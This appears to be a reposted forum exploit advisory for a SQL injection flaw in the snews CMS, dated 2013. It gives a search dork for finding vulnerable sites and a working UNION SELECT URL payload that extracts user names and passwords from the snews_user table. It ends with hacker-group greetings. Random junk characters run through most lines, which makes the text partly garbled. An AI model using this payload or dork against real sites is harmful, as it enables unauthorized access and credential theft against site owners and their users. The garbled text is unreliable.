标题: CMS snews SQL Injection Vulnerability
$ h3 `4 `; K9 w/ I- u1 L Z作者: By onestree$ D( C2 H0 e ^# a3 J, H2 G
下载地址 : http://snewscms.com/
6 }% H. `4 J( O @# j& I& Z0 P测试平台 : ubuntu 12.10 / win 7
$ Q. G/ ?" G# m1 E/ R关键词: inurl:"tanyakan pada rumput yang bergoyang"6 L0 b+ S$ o1 M' {' Z! D6 ^( ~$ b
( l9 R5 t9 w/ s- \
' u! p7 g* ~0 a; [
*************************************************************
0 h. g7 [' ?9 V5 \; e
( a$ n$ Q3 H/ r" I4 e/ }/ OSQL poc:6 j6 f% q+ p2 v$ a+ x7 J
, c& _- E! a- c$ X. K, bhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
" @4 l$ N$ v+ a9 `
5 i9 }. e/ p/ t, l" C4 Y/ e5 L; M示例* S9 d# d$ v# ]$ O6 L! U. n! r
( ?! ^& a' B9 ~
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
1 k8 W- a! w! e# w! j9 I' T/ Q - q) }/ @" H+ W E0 S/ O6 s' n
( ~1 N5 l$ j. y+ O, u3 ?
致谢:* C4 B+ n, @1 ]. t1 ~
" x9 W9 A3 {' K# M* \4 V Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell- c* b! S6 g/ d& j" d. T
0 H7 ~) h2 ]4 {% ]# E/ z
indonesiancoder - moeslimh4x0r - go-coder
8 v* ~& {& Z: F2 t
v6 @3 M, d4 a! ~# E$ e4 N1 @spesial my hunny :*
4 q3 `7 U9 o/ F/ z4 X. i2 G4 | |
发表于 2013-1-23 08:55:06
收藏
支持
反对